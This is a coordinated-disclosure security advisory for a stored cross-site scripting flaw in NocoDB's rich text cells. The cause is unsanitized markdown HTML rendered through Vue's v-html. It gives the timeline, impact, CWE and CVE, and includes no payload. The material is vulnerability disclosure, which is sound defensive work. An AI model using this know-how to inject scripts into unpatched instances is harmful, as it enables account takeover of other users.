Coordinated Disclosure Timeline
- 2026-02-09: Vulnerability was reported via GitHub’s private vulnerability reporting feature.
- 2026-03-02: Advisory and fix were released.
Summary
NocoDB version v0.301.2 is vulnerable to a stored cross-site scripting (XSS) attack (GHSL-2026-030) that allows malicious scripts to be injected into rich text cells, potentially leading to unauthorized script execution in the context of other users.
Project
nocodb
Tested Version
Details
Stored Cross-Site Scripting in rich text cells (GHSL-2026-030)
A stored cross-site scripting vulnerability exists in NocoDB’s Rich Text cell rendering functionality. When a Long Text field is configured with rich text mode enabled, user-supplied content is parsed through a Markdown parser that has HTML passthrough enabled and is subsequently rendered using Vue’s v-html directive without sanitization. This allows authenticated attackers to inject malicious HTML/JavaScript that executes in the browser context of any user viewing the affected record, potentially leading to session hijacking, credential theft, or unauthorized actions performed on behalf of privileged users.
The v-html directive inside of the TextArea component renders richTextContent directly into the DOM.
The NcMarkdownParser uses markdown-it configured with html: true, which allows raw HTML to pass through unchanged.
Impact
This issue may lead to account takeover due to stored Cross-site scripting (XSS).
CWEs
- CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)
CVE
- CVE-2026-28401
Credit
This issue was discovered with the GitHub Security Lab Taskflow Agent and manually verified by GHSL team members @p- (Peter Stöckli) and @m-y-mo (Man Yue Mo).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2026-030 in any communication regarding this issue.